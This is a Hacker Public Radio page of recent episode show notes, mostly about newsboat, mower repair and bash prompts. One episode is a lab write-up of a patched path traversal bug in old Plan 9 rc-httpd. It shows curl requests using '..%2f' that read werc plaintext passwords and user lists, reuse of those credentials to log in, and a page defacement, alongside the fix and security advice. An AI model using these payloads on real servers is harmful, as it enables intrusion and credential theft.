
Hacker Public Radio

Your ideas, projects, opinions - podcasted.

New episodes Monday through Friday.



Welcome to HPR the Community Podcast

We started producing shows as Today with a Techie on 2005-09-19, 17 years, 0 months, 13 days ago. Our shows are produced by listeners like you and can be on any topic that "are of interest to hackers". If you listen to HPR then please consider contributing one show a year. If you record your show now it could be released in 17 days.

Meet the team


Latest Shows


hpr3695 :: How I watch youtube with newsboat

Using youtube's channel RSS feeds to watch youtube from the command line


Hosted by binrc on 2022-09-30 is flagged as Explicit and released under a CC-BY-SA license.
newsboat, RSS, youtube.
Listen in ogg, spx, or mp3 format. general. | Comments (2).

How I watch youtube with newsboat

I find that the youtube web ui is designed to keep users on the site by feeding them an unending stream of information. Bright colors, distracting thumbnails, peanut galleries, etc. I prefer to consume my videos in the same way I consume everything else: via RSS.

RSS is my favorite way of aggregating things that other people have made because it allows me, the user, to interact with their things

The only dependencies not on a standard UNIX system are newsboat and a video player. I also use yt-dlp to download videos for later viewing. I like mpv but you can substitute your own.

$ sudo $pkgmgr install newsboat mpv yt-dlp

Getting RSS feeds from youtube

Youtube (currently) provides RSS feeds for channels.

Finding Youtube channel ID

Sometimes channels have vanity URLs that can make it difficult to find the channel ID. Other times, the URL contains the channel ID. All youtube channel IDs start with the string UC so we can easily grep for them.

$ curl https://www.youtube.com/c/RMCRetro | grep --color "href=\"https://www.youtube.com/channel/UC"
[ lots of nonsense ]
href="https://www.youtube.com/channel/UCLEoyoOKZK0idGqSc6Pi23w"
[ lots of nonsense ]

In order to turn this channel ID into something useful, we create the following URL:

https://www.youtube.com/feeds/videos.xml?channel_id=UCLEoyoOKZK0idGqSc6Pi23w

Google takeout can also be used to export youtube subscriptions.

The export format is a CSV that contains the channel IDs for all of our subscriptions.

Channel Id,Channel Url,Channel Title
UCLEoyoOKZK0idGqSc6Pi23w,http://www.youtube.com/channel/UCLEoyoOKZK0idGqSc6Pi23w,RMC - The Cave

Newsboat url list

Newsboat reads its list of URLs from ~/.config/newsboat/urls. Every URL we add to this list will be automatically fetched. You can make separate URL lists for your list of videos and your list of standard text-based RSS feeds.

If you have an exported CSV, you can easily modify it so that newsboat will accept it as a list of URLs: delete row 1 (the header) and the first column together with its comma, then replace the comma between the URL and the channel name with a tab character. Running sed 's/channel\//feeds\/videos.xml?channel_id=/g' on the file is an easy way to replace the website URL with the feed URL. Newsboat only reads the first field of every row, so the channel name can be kept for easier subscription management.

http://www.youtube.com/feeds/videos.xml?channel_id=UCLEoyoOKZK0idGqSc6Pi23w     RMC - The Cave
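The same CSV-to-urls conversion, as an added example in Python rather than the sed one-liner above (this is not code from the show notes): the csv module copes with quoted titles, rows whose first field is not a well-formed channel id are skipped instead of ending up in the urls file, and whitespace inside a title is collapsed because newsboat treats everything after the URL as tags. The sample CSV is constructed in the Google Takeout layout shown above, and the "UC plus 22 URL-safe characters" id check is an assumption drawn from the ids in this post.

```python
import csv
import io
import re
from typing import List

# Constructed sample in the Google Takeout subscriptions.csv layout shown above.
SAMPLE_CSV = """Channel Id,Channel Url,Channel Title
UCLEoyoOKZK0idGqSc6Pi23w,http://www.youtube.com/channel/UCLEoyoOKZK0idGqSc6Pi23w,RMC - The Cave
UC9-y-6csu5WGm29I7JiwpnA,http://www.youtube.com/channel/UC9-y-6csu5WGm29I7JiwpnA,Computerphile
not-a-channel-id,http://example.invalid/,Bogus row that should be skipped
"""

# Assumption: channel ids are "UC" followed by 22 URL-safe characters, as in the ids above.
CHANNEL_ID = re.compile(r"^UC[A-Za-z0-9_-]{22}$")
FEED_URL = "https://www.youtube.com/feeds/videos.xml?channel_id={}"


def csv_to_urls(csv_text: str) -> List[str]:
    """Return newsboat url-list lines ("<feed url><TAB><title>") for each valid row."""
    lines = []
    for row_number, row in enumerate(csv.DictReader(io.StringIO(csv_text)), start=2):
        channel_id = (row.get("Channel Id") or "").strip()
        if not CHANNEL_ID.match(channel_id):
            # Anything that is not a well-formed id never reaches the urls file.
            print(f"skipping row {row_number}: bad channel id {channel_id!r}")
            continue
        # Newsboat reads the URL and then treats the rest of the line as tags,
        # so collapse stray tabs/newlines inside the title to single spaces.
        title = " ".join((row.get("Channel Title") or "").split())
        lines.append(f"{FEED_URL.format(channel_id)}\t{title}")
    return lines


if __name__ == "__main__":
    # Typical use: python3 takeout_to_newsboat.py < subscriptions.csv >> ~/.config/newsboat/urls
    import sys

    source = SAMPLE_CSV if sys.stdin.isatty() else sys.stdin.read()
    print("\n".join(csv_to_urls(source)))
```

Run without input to see the constructed sample converted; pipe the real export in to produce lines you can append to ~/.config/newsboat/urls.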

Newsboat config

In order to play videos, we need to add some macros to the newsboat config file at ~/.config/newsboat/config

Mine looks like this.

# load URLs on launch
auto-reload  yes

# vim binds
bind-key j down
bind-key k up
bind-key j next articlelist
bind-key k prev articlelist
bind-key J next-feed articlelist
bind-key K prev-feed articlelist
bind-key G end
bind-key g home
bind-key d pagedown
bind-key u pageup
bind-key l open
bind-key h quit
bind-key a toggle-article-read
bind-key n next-unread
bind-key N prev-unread
bind-key D pb-download
bind-key U show-urls
bind-key x pb-delete

# macro setup
browser linkhandler
macro , open-in-browser

# launch video player
macro v set browser "setsid -f mpv" ; open-in-browser ; set browser linkhandler

# download video
macro d set browser "yt-dlp" ; open-in-browser ; set browser linkhandler

# download audio only
macro a set browser "yt-dlp --embed-metadata -xic -f bestaudio/best" ; open-in-browser ; set browser linkhandler

Video demo

This is a demo of using newsboat with videos. To execute a macro, you type the macro prefix , followed by v (or whichever other letter you bound the macro to).

[Video demo in webm format]

A url list to get you started

https://www.youtube.com/feeds/videos.xml?channel_id=UC3ts8coMP645hZw9JSD3pqQ        Andreas Kling
https://www.youtube.com/feeds/videos.xml?channel_id=UC9-y-6csu5WGm29I7JiwpnA        Computerphile
https://www.youtube.com/feeds/videos.xml?channel_id=UC15BJjhPr4d5gTClhmC4HRw        Elliot Coll
https://www.youtube.com/feeds/videos.xml?channel_id=UCxQKHvKbmSzGMvUrVtJYnUA        Learn Linux TV
https://www.youtube.com/feeds/videos.xml?channel_id=UCm9K6rby98W8JigLoZOh6FQ        LockPickingLawyer
https://www.youtube.com/feeds/videos.xml?channel_id=UCl2mFZoRqjw_ELax4Yisf6w        Louis Rossmann
https://www.youtube.com/feeds/videos.xml?channel_id=UC2eYFnH61tmytImy1mTYvhA        Luke Smith
https://www.youtube.com/feeds/videos.xml?channel_id=UC7YOGHUfC1Tb6E4pudI9STA        Mental Outlaw
https://www.youtube.com/feeds/videos.xml?channel_id=UCjFaPUcJU1vwk193mnW_w1w        Modern Vintage Gamer
https://www.youtube.com/feeds/videos.xml?channel_id=UCLEoyoOKZK0idGqSc6Pi23w        RMC - The Cave
https://www.youtube.com/feeds/videos.xml?channel_id=UC4rqhyiTs7XyuODcECvuiiQ        Scott The Woz
https://www.youtube.com/feeds/videos.xml?channel_id=UC5I2hjZYiW9gZPVkvzM8_Cw        Techmoan
https://www.youtube.com/feeds/videos.xml?channel_id=UCy0tKL1T7wFoYcxCe0xjN6Q        Technology Connections
https://www.youtube.com/feeds/videos.xml?channel_id=UC8uT9cgJorJPWu7ITLGo9Ww        The 8-Bit Guy
https://www.youtube.com/feeds/videos.xml?channel_id=UC5UAwBUum7CPN5buc-_N1Fw        The Linux Experiment
https://www.youtube.com/feeds/videos.xml?channel_id=UCFMx-JitepTttWc-ABHhu8A        This Week in Retro
https://www.youtube.com/feeds/videos.xml?channel_id=UCsnGwSIHyoYN0kiINAGUKxg        Wolfgang's Channel
https://www.youtube.com/feeds/videos.xml?channel_id=UCJ8V9aiz50m6NVn0ix5v8RQ        decino

hpr3694 :: Robo Tripping Ravelords of the Apocalypse

Organic Synthesis of Human and Machine Occurs Post Cosmic Event


Hosted by Mechatroniac on 2022-09-29 is flagged as Clean and released under a CC-BY-SA license.
beam,righttorepair,robots,mechatronics,apocalypse.
Listen in ogg, spx, or mp3 format. general. | Comments (5).

In the aftermath of the cosmic event that destroyed all computers below a certain die size, more robust machines emerge from the ashes.

Sketch of the machine


hpr3693 :: Fixing the automatic cutoff mechanism to an electric mower

Rho`n describes fixing the safety mechanism to his electric mower


Hosted by Rho`n on 2022-09-28 is flagged as Clean and released under a CC-BY-SA license.
electric lawnmower,lawnmower,repair.
Listen in ogg, spx, or mp3 format. general. | Comments (0).

Synopsis

In this episode, Rho`n fixes the safety mechanism of his Neuton electric mower. Recently the automatic cutoff mechanism had been getting finicky: the safety bar had to be pulled back just the correct amount to keep the mower running, and often both the left and right sides of the safety bar had to be held to prevent the mower from turning off.

After opening up the housing holding the safety bars, it appeared that the tension spring which causes the bars to disengage from the switch when the bars are released was loose. This would allow the prong that the bars push into the switch contact to slip off the contact and slide overtop of the switch—turning off the mower. After tightening the coils and putting it back in place, the issue was resolved.

Neuton electric mower
Neuton electric mower with handle collapsed showing the bottom of the safety handle housing.
Internal view of safety mechanism
Internal view of the automatic cutoff mechanism.

Attribution

The transition sound used between audio clips is found on freesound.org:
Name: Harp Transition Music Cue
Author: DanJFilms
License: Creative Commons Zero


hpr3692 :: What is a real hacker?

I discuss the issue of what makes a real hacker with my son


Hosted by Lurking Prion on 2022-09-27 is flagged as Explicit and released under a CC-BY-SA license.
cybersecurity,security,EvilSteve,hacking,hacker.
Listen in ogg, spx, or mp3 format. Privacy and Security. | Comments (2).

In this episode, I discuss the ever prominent question of "What is a real hacker?" in explicitly explicit language. So enjoy the discussion and give me your thoughts. This topic always gets people's feathers ruffled, so agree, disagree? Leave your thoughts or post your own segment on HPR!


hpr3691 :: Starship.rs the best prompt I don't use

Bash prompts


Hosted by Klaatu on 2022-09-26 is flagged as Clean and released under a CC-BY-SA license.
bash,ps1,terminal,linux.
Listen in ogg, spx, or mp3 format. general. | Comments (0).

Here are the snippets I use in my .bashrc file.

RED='\033[0;31m'
PLAIN='\033[0m' # No Color
WHITE='\e[97m'
GREEN='\e[0;32m'
PURPLE='\e[35;35m'
CYAN='\e[36;36m'

JAVA_VERSION=`java --version | head -1 | cut -f2 -d' '`

IP=$(hostname -I | awk '{print $1;}' )
source /usr/doc/git-2.35.1/contrib/completion/git-prompt.sh
PS1='\! [\['$GREEN'\]$(hostname -s) $IP\['$PLAIN'\]] [\['$CYAN'\]$(pwd -P)\['$PLAIN'\]] $(__git_ps1 "[\['$PURPLE'\] %s\['$PLAIN'\]]")[☕ '$JAVA_VERSION']\n\['$GREEN'\]$\['$PLAIN'\] '

hpr3690 :: Planning the Trip

Taking our revised plan to completion


Hosted by Ahuka on 2022-09-23 is flagged as Clean and released under a CC-BY-SA license.
Travel, trip planning, full trip.
Listen in ogg, spx, or mp3 format. Travel. | Comments (0).

We take our revised objectives from the last episode and flesh out a completed plan that gets us out west and back home again.


hpr3689 :: Linux Inlaws S01E65: TerminusDB

TerminusDB NoSQL database


Hosted by monochromec on 2022-09-22 is flagged as Explicit and released under a CC-BY-SA license.
TerminusDB, graph databases, Seshat, Rust, Carbon by Google, Substack.
Listen in ogg, spx, or mp3 format. Linux Inlaws. | Comments (0).

As part of the effort of turning the planet's premier Rust marketing podcast into a full-blown NoSQL show, in this episode Chris hosts some of the key people behind a NoSQL database called TerminusDB (Martin couldn't make it as he was firing, um, re-organising the Inlaw's marketing department once again). Luke (the CEO) and Gavin (CTO) of TerminusDB spill the beans on the history of the project, ontologies and why they still matter not only in a mobile-first world and why a website called DB Engines simply doesn't do the trick (putting it very diplomatically). Never mind the road ahead... (including quantum AI and some other fancy stuff - you heard it here first!). And also next week's lotto numbers (perhaps).

Links:


hpr3688 :: Education, Certifications, and sipping on the Socials

I discuss the value of an Education, certifications, and a positive Social Media presence.


Hosted by Lurking Prion on 2022-09-21 is flagged as Explicit and released under a CC-BY-SA license.
cybersecurity,security,EvilSteve,socialmedia,education,certifications.
Listen in ogg, spx, or mp3 format. Privacy and Security. | Comments (0).

I have had a lot of questions over the years about how to proceed with a career, education, and certifications. So, I give my take on these and what they mean relative to my life experiences. Individual mileage may vary. I also discuss the need to have a public facing social media presence that is active and consistent. Hide the private Socials and search to see what actually shows up when searching for yourself. Your future employers will. Just sayin'.


hpr3687 :: Hacker Public Radio 2021 - 2022 New Years Show Part 6

The HPR community comes together to chat


Hosted by Honkeymagoo on 2022-09-20 is flagged as Explicit and released under a CC-BY-SA license.
HPR, New Years, Talking.
Listen in ogg, spx, or mp3 format. general. | Comments (1).

Hacker Public Radio New Years Eve Show 2021 - 2022

Part 6

https://rsgb.org/main/clubs-training/for-students/foundation/

https://logseq.com/

The End!

  • Thanks To:
    • Mumble Server: Delwin
    • HPR Site/VPS: Joshua Knapp - AnHonestHost.com
    • Streams: Honkeymagoo
    • EtherPad: HonkeyMagoo
    • Shownotes: HPLovecraft

Aftershow

Swedish new words of 2021: https://www.svt.se/kultur/experten-de-orden-kommer-jag-sakna-mest (Swedish)

https://en.wikipedia.org/wiki/Endometriosis

https://en.wikipedia.org/wiki/Vulvar_vestibulitis


hpr3686 :: Followup for HPR3675: Clarifications on the path traversal bug

installing a plan 9 cpu+web server, namespaces to the rescue, web app security models and more


Hosted by binrc on 2022-09-19 is flagged as Explicit and released under a CC-BY-SA license.
Plan 9, private namespaces, security, research operating systems.
Listen in ogg, spx, or mp3 format. general. | Comments (0).

Followup for HPR3675: Installing a Plan 9 CPU server, Plan 9 web server, clarifications on the path traversal bug, private namespaces to the rescue, web application security models


Installing Plan 9 with libvirt

[root@localhost]# virt-install -n 9pwn \
--description "pre-patched rc-httpd" \
--osinfo=unknown \
--memory=4096 \
--vcpus=4 \
--disk path=/var/lib/libvirt/images/9pwn.qcows,bus=virtio,size=10 \
--graphics spice \
--cdrom ~/Downloads/9front-8593.acc504c319a4b4188479cfa602e40cb6851c0528.amd64.iso \
--network bridge=virbr0

[root@localhost]# virt-viewer 9pwn

How I find the IP of my guests and add it to my /etc/hosts for faster access.

[root@localhost]# virsh domiflist 9pwn
 Interface   Type     Source   Model   MAC
----------------------------------------------------------
 vnet3       bridge   virbr0   e1000   52:54:00:43:8a:50

[root@localhost]# arp -e | grep 52:54:00:43:8a:50
192.168.122.20           ether   52:54:00:43:8a:50   C                     virbr0

[root@localhost]# echo cirno 192.168.122.20 >> /etc/hosts

Proceed as normal with a 9 installation


Set up CPU server with rc-httpd and werc

I wrote about configuring a CPU server and also mirrored the notes at my 9front webserver containing a mirror of my plan 9 related things (using self-signed certs but it's fine) I've snarfed+pasted it here for the sake of completeness and modified it slightly so that it's more accessible for other people. I've also revised these notes so that they're less-broken. I may or may not update them.

I'm using 9front for this. It has more secure authentication protocols when it comes to remotely connecting.

Configuring a CPU server

Add users to file server

Connect to the file server and add a new user called <ExampleUser> who is in the groups sys, adm, and upas:

term% con -C /srv/cwfs.cmd
newuser <ExampleUser>
newuser sys +<ExampleUser>
newuser adm +<ExampleUser>
newuser upas +<ExampleUser>

Reboot and set user=<ExampleUser> when prompted at boot time.

Configure user's environment

This is similar to cp -r /etc/skel /home/<ExampleUser> on a UNIX system.

/sys/lib/newuser

Configure headless booting

Mount the boot partition:

term% 9fs 9fat

Edit the boot config, /n/9fat/plan9.ini:

bootfile=9pc64
nobootprompt=local!/dev/sdC0/fscache
mouseport=ps2
monitor=vesa
vgasize=1024x768x14
user=<ExampleUser>
tiltscreen=none
service=cpu

Add hostowner info to nvram

Hostowner is similar to root but not quite. In our configuration, hostowner is close to being equivalent to a root user. The user= line in our bootprompt sets the hostowner.

For automatic booting (i.e. not entering a password at the physical machine every time we power it on), we need to add the hostowner's key to nvram.

term% nvram=/dev/sdF0/nvram auth/wrkey
bad nvram des key
bad authentication id
bad authentication domain
authid: <ExampleUser>
authdom: cirno
secstore key: <press the return key if you do not want to type this at boot time>
password: <make it 8 chars>

Configure auth server

In order to connect to the system over the network, the new user must be added to the auth server.

term% auth/keyfs
term% auth/changeuser <ExampleUser>
Password: <what you put earlier>
Confirm password:
Assign new Inferno/POP secret? [y/n]: n
Expiration date (YYYYMMDD or never) [never]: never
Post id:
User's full name:
Department #:
User's email address:
Sponsor's email address:
user <ExampleUser> installed for Plan 9

Configure permissions

/lib/ndb/auth is similar to /etc/sudoers. This entry allows the new user to execute commands as any other user except sys and adm (sys and adm are really more like groups, but who cares).

Append to /lib/ndb/auth:

hostid=<ExampleUser>
    uid=!sys uid=!adm uid=*

Then reboot.

Test if it worked with drawterm

The 9front version of drawterm must be used as it supports the better crypto in 9front. Other drawterm versions probably won't work.

$ /opt/drawterm -u <ExampleUser> -h example.com -a example.com -r ~/

Configure rc-httpd

Edit /rc/bin/rc-httpd/select-handler.

This file is something like /etc/httpd.conf on a UNIX system.

#!/bin/rc
PATH_INFO=$location

switch($SERVER_NAME) {
case example.com
        FS_ROOT=/sys/www/$SERVER_NAME
        exec static-or-index
case *
        error 503
}

To enable the listener on port 80 (9front disables services whose file name starts with !) and make the handler executable:

cpu% cp /rc/bin/service/!tcp80 /rc/bin/service/tcp80
cpu% chmod +x /rc/bin/rc-httpd/select-handler

Reboot and test.

SSL

I will never give money to the CA racket. Self-signed is the way to go on systems that don't support acme.sh, the only ACME client I use for obtaining free SSL certs.

Generate and install:

cpu% ramfs -p
cpu% cd /tmp
cpu% auth/rsagen -t 'service=tls role=client owner=*' > key
cpu% chmod 600 key
cpu% cp key /sys/lib/tls/key
cpu% auth/rsa2x509 'C=US CN=example.com' /sys/lib/tls/key | auth/pemencode CERTIFICATE > /sys/lib/tls/cert
cpu% mkdir /cfg/$sysname
cpu% echo 'cat /sys/lib/tls/key >> /mnt/factotum/ctl' >> /cfg/$sysname/cpustart

Now add a listener in /rc/bin/service/tcp443:

#!/bin/rc
exec tlssrv -c /sys/lib/tls/cert -l /sys/log/https /rc/bin/service/tcp80 $*

And make it executable:

cpu% chmod +x /rc/bin/service/tcp443

Install and configure werc

cpu% cd
cpu% mkdir /sys/www && cd /sys/www
cpu% hget http://werc.cat-v.org/download/werc-1.5.0.tar.gz  > werc-1.5.0.tgz
cpu% tar xzf werc-1.5.0.tgz
cpu% mv werc-1.5.0 werc

# ONLY DO THIS IF YOU *MUST* RUN THE THINGS THAT ALLOW WERC TO WRITE TO DISK
# EG. DIRDIR, BLAGH, ETC
# DON'T DO THIS, JUST USE DRAWTERM OVER THE NETWORK
# HTTP CLIENTS SHOULD NEVER BE ALLOWED TO WRITE TO DISK
# PLEASE I BEG YOU
cpu% cd .. && for (i in `{du www | awk '{print $2}'}) chmod 777 $i

cpu% cd /sys/www/werc/sites/
cpu% mv default.cat-v.org example.com

Now re-edit /rc/bin/rc-httpd/select-handler so that it hands requests to werc (the case label has to match $SERVER_NAME; on my machine that is cirno):

#!/bin/rc
WERC=/sys/www/werc
PLAN9=/
PATH_INFO=$location
switch($SERVER_NAME){
case cirno
        FS_ROOT=$WERC/sites/$SERVER_NAME
        exec static-or-cgi $WERC/bin/werc.rc
case *
        error 503
}

Test the website. Werc is fiddly. Werc is archaic. Werc is fun.


Path traversal vulnerabilities in old versions of rc-httpd

Using release COMMUNITY VS INFRASTRUCTURE, an old release with old rc-httpd, I have done the above steps. In current releases this bug no longer exists. Use current releases.

The vulnerability

# get list of werc admin users
[root@localhost]# curl http://cirno/..%2f..%2f/etc/users/admin/members
pwn
# get that werc user's password
[root@localhost]# curl http://cirno/..%2f..%2f/etc/users/pwn/password
supersecret

Wait, the passwords for werc are stored in plain text? Let's log in

[root@localhost]# firefox http://cirno/_users/login

Now let's see if any of the werc users are also system users:

# let's enumerate users
[root@localhost]# curl http://cirno/..%2f..%2f..%2f..%2f..%2f..%2f/adm/users
-1:adm:adm:glenda,pwn
0:none::
1:tor:tor:
2:glenda:glenda:
3:pwn:pwn:
10000:sys::glenda,pwn
10001:map:map:
10002:doc::
10003:upas:upas:glenda,pwn
10004:font::
10005:bootes:bootes:

Let's hope that no one is re-using credentials. Let's check just to be sure.

$ PASS=supersecret /opt/drawterm -u pwn -h cirno -a cirno -G
cpu% cat /env/sysname
cirno
cpu%

This is what happens when you have path traversal vulnerabilities, an authentication vulnerability in your CMS, and shared logins/passwords.

How the static-or-cgi handler works

rc-httpd calls various handler scripts that decide what to do with requests. In the example configuration for werc, rc-httpd is instructed to call the static-or-cgi script.

I will compile these archaic rc scripts into pseudo code for the listener.

The static-or-cgi handler (the handler specified in the httpd config) is simple:

#!/bin/rc
cgiargs=$*

fn error{
    if(~ $1 404)
        exec cgi $cgiargs
    if not
        $rc_httpd_dir/handlers/error $1
}

if(~ $location */)
    exec cgi $cgiargs
if not
    exec serve-static

  1. If the requested location ends in a slash, call the cgi handler and pass it the arguments.
  2. Otherwise, call the serve-static handler. The error function above sends 404s back to the cgi handler, so werc gets to answer for locations that do not exist as files.

How the serve-static handler works

The problem lies in the serve-static handler:

#!/bin/rc
full_path=`{echo $"FS_ROOT^$"PATH_INFO | urlencode -d}
full_path=$"full_path
if(~ $full_path */)
    error 503
if(test -d $full_path){
    redirect perm $"location^'/' \
        'URL not quite right, and browser did not accept redirect.'
    exit
}
if(! test -e $full_path){
    error 404
    exit
}
if(! test -r $full_path){
    error 503
    exit
}
do_log 200
switch($full_path){
case *.html *.htm
        type=text/html
case *.css
        type=text/css
case *.txt *.md
        type=text/plain
case *.jpg *.jpeg
        type=image/jpeg
case *.gif
        type=image/gif
case *.png
        type=image/png
case *
        type=`{file -m $full_path}
}
if(~ $type text/*)
    type=$type^'; charset=utf-8'
max_age=3600    # 1 hour
echo 'HTTP/1.1 200 OK'^$cr
emit_extra_headers
echo 'Content-type: '^$type^$cr
echo 'Content-length: '^`{ls -l $full_path | awk '{print $6}'}^$cr
echo 'Cache-control: max-age='^$max_age^$cr
echo $cr
exec cat $full_path

  1. Decode the URL: full_path is FS_ROOT joined to PATH_INFO and run through urlencode -d.
  2. If the decoded path ends in '/', error 503.
  3. If it is a directory, redirect to the same location with a trailing slash and exit.
  4. If it does not exist, error 404; if it exists but is not readable, error 503.
  5. If you haven't exited by now, serve the file.

The problem is no sanitization. The script checks whether the file exists and is readable AFTER DECODING THE URL STRING, but never checks that the decoded path is still inside FS_ROOT.

The urlencode -d command decodes percent-encoded characters:

cpu% echo 'http://cirno/..%2f' | urlencode -d
http://cirno/../

Does ../ exist in */? The answer is yes.

.. is a directory contained inside of */

*/../ is the current working directory.

How they fixed it

Adding a sanitizer. By comparing the decoded URL against the actual file path it would resolve to, and exiting if there is a mismatch, all %2f funny business is avoided.
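The same idea in Python, as an added example that is not rc-httpd's code: resolve_unchecked mirrors the old serve-static logic (decode, concatenate, then only check existence), and resolve_checked is the kind of sanitizer the fix adds, refusing any decoded path that does not stay under FS_ROOT. The document root, the index file and the "secret" file beside the root are constructed in a temporary directory, and the function names are the example's own.

```python
import os
import tempfile
from typing import Optional
from urllib.parse import unquote


def resolve_unchecked(fs_root: str, path_info: str) -> str:
    """Old serve-static behaviour: FS_ROOT ^ (urlencode -d PATH_INFO), no containment check.

    "%2f" decodes to "/", so a "/..%2f..." location walks straight out of fs_root.
    """
    return fs_root + unquote(path_info)


def resolve_checked(fs_root: str, path_info: str) -> Optional[str]:
    """Sanitized variant: decode once, canonicalise, keep only paths under fs_root.

    Returns the canonical file path, or None when the request must be refused.
    """
    decoded = unquote(path_info)
    if "\x00" in decoded:
        return None  # a NUL byte would truncate the path in a C-level open()
    root = os.path.realpath(fs_root)
    # realpath collapses ".." segments and follows symlinks, so a symlink inside
    # the document root that points outside of it is caught as well.
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def demo() -> dict:
    """Build a constructed document root with a secret next to it and compare both resolvers."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "www")
        os.makedirs(root)
        with open(os.path.join(root, "index.html"), "w") as f:
            f.write("<h1>hello</h1>\n")
        with open(os.path.join(tmp, "secret"), "w") as f:
            f.write("constructed secret outside the document root\n")

        traversal = "/..%2fsecret"          # the %2f trick from the show notes
        double_encoded = "/..%252fsecret"   # decodes once to a literal "..%2fsecret" file name
        index = os.path.realpath(os.path.join(root, "index.html"))
        return {
            "unchecked_reaches_secret": os.path.isfile(resolve_unchecked(root, traversal)),
            "checked_refuses_traversal": resolve_checked(root, traversal) is None,
            "checked_serves_index": resolve_checked(root, "/index.html") == index,
            # Double encoding stays inside the root; the later "test -e" would just 404 it.
            "checked_double_encoded_inside_root": resolve_checked(root, double_encoded) is not None,
        }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The containment test is done on the canonical path, after decoding, which is the ordering the old handler got wrong: decoding first and then checking the result against the root is what makes the check meaningful.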


Other (optional) bad config options in werc

rc-httpd aside, a bad werc config can still lead to website defacement if your non rc-httpd webserver has a path traversal vulnerability.

Additionally I have modified the DAC for /sys/www to allow werc, a child process of rc-httpd to write to disk. rc-httpd runs as the none user so it's not typically allowed to write to disk unless explicitly permitted. I do not allow this on my 9 webserver because it's the worst idea in the history of all time ever.

I enabled the dirdir and blagh modules as if I were the type of admin who does a chmod -R 777 /var/www/htdocs because that's what the wordpress installation guide told me to do so I could have a cool and easy way to modify my website from the browser.

Let's pretend that I'm not the admin of this system and scrape the werc config just to see if the hypothetical badmin has these modules enabled.

# get config
[root@localhost]# curl http://cirno/..%2f..%2f/sites/cirno/_werc/config
masterSite=cirno
siteTitle='Werc Test Suite'
conf_enable_wiki
wiki_editor_groups admin

Hmmm, looks like these modules are enabled so we can assume that httpd is allowed to write to disk. Let's modify cirno/index.md to warn the admin. As a funny joke. Totally not a crime under the Computer Fraud and Abuse Act. Totally not an inappropriate way to warn admins about a vulnerability.

[root@localhost]# curl -s cirno | pandoc --from html --to plain
quotes | docs | repo | golang | sam | man | acme | Glenda | 9times |
harmful | 9P | cat-v.org

Related sites: | site updates | site map |

Werc Test Suite

-   › apps/
-   › titles/

SECURITY ADVISORY:

lol this guy still hasn't figured out the ..%2f trick

Powered by werc

Modifying werc to support password hashing

Adding password hashes isn't too difficult. Being constrained by time, I have not done this quite yet. Reading the source code, all it takes is modifying 2 werc scripts: bin/werclib.rc and bin/aux/addwuser.rc

% echo 'supersecret' | sha1sum -2 512

Private namespaces to the rescue

Luckily enough, the webserver runs as the none user with its own namespace.

Comparing the hostowner's namespace and none user's namespace

I grab the namespace from the system console (ie not from drawterm) and from the listen command, then run a diff (unix style) to show the differences.

cpu% ns | sort > cpu.ns
cpu% ps -a | grep -e 'listen.*80' | grep -v grep
none            355    0:00   0:00      132K Open     listen [/net/tcp/2 tcp!*!80]
cpu% ns 355 | sort > listen.ns
cpu% diff -u listen.ns cpu.ns
--- listen.ns
+++ cpu.ns
@@ -6,17 +6,29 @@
 bind  /amd64/bin /bin
 bind  /mnt /mnt
 bind  /mnt/exportfs /mnt/exportfs
+bind  /mnt/temp/factotum /mnt/factotum
 bind  /n /n
 bind  /net /net
 bind  /root /root
+bind -a '#$' /dev
 bind -a '#I' /net
+bind -a '#P' /dev
+bind -a '#S' /dev
 bind -a '#l' /net
+bind -a '#r' /dev
+bind -a '#t' /dev
+bind -a '#u' /dev
+bind -a '#u' /dev
 bind -a '#¤' /dev
 bind -a '#¶' /dev
+bind -a '#σ/usb' /dev
+bind -a '#σ/usbnet' /net
 bind -a /rc/bin /bin
 bind -a /root /
+bind -b '#k' /dev
 bind -c '#e' /env
 bind -c '#s' /srv
+bind -c /usr/pwn/tmp /tmp
 cd /usr/pwn
 mount -C '#s/boot' /n/other other
 mount -a '#s/boot' /
@@ -26,4 +38,4 @@
 mount -a '#s/slashmnt' /mnt
 mount -a '#s/slashn' /n
 mount -aC '#s/boot' /root
-mount -b '#s/factotum' /mnt
+mount -b '#s/cons' /dev

The major difference is that the hostowner (equivalent to root user) has a lot more things bound to his namespace:

  • '#$' PCI interfaces
  • '#P' APM power management
  • '#S' storage devices
  • '#r' realtime clock and nvram
  • '#t' serial ports
  • '#u' USB
  • '#σ' /shr global mountpoints
  • '#k' keyboard
  • /tmp directories
  • '#s' various special files relating to services

The listen process in question is fairly well isolated from the system. Minimal system damage can be caused by pwning a process owned by none.


Closing

An argument could be made that the rc-httpd vulnerability was "not a bug" because "namespaces are supposed to segregate the system".

I disagree on this point. Namespaces are good and all but security is a multi-layer thing. Relying on a single security feature to save your system means relying on a single point of failure. Chroot escapes, namespace escapes, container escapes, and VM escapes are all things we need to be thinking about when writing software that touches the internet. Although unlikely, getting pwnd in spite of these security methods is still possible; all user input is dangerous and all user input that becomes remote code execution always results in privilege escalation no matter how secure you think your operating system is. Each additional layer of security makes it harder for attackers to get into the system.

For example, when I write PHP applications, I consider things in this order:

  1. don't pass unnecessary resources into the document root via symlinks, bind mounts, etc.
  2. never ever use system() in a context where user input can ever be passed to the function in order to avoid shell escapes
  3. sanitize all user input depending on context. Ex: if the PHP program is directly referencing files, make a whitelist and compare requests to this whitelist. If the PHP process is writing to a database, use prepared statements.
  4. fire up a kali linux vm and beat the test server half to death
  5. iterate upon my ignorance
  6. doubly verify DAC just to be sure
  7. re-check daemon configs to make sure I'm not doing anything stupid
  8. FINALLY: rely on SELinux or OpenBSD chroots (depending on prod env) to save me if all else failed

And of course the other things like firewalls (with whitelists for ports and blacklists for entire IP address blocks), key based ssh authentication, sshd configurations that don't make it possible to enumerate users, rate limiters, etc.

Each layer of security is like a filter. If you have enough layers of filters it would take an unrealistic amount of force to push water through this filter. Although no system is perfectly safe from three letter agencies, a system with multiple layers of security is typically safe from drive-by attacks.

Final exercise: intentionally write a php script that does path traversal. Run this on a system with SELinux. Try to coax /etc/passwd out of the server. Now try php-fpm instead of mod_php or vice-versa. You'll be surprised when even MAC doesn't protect your system.

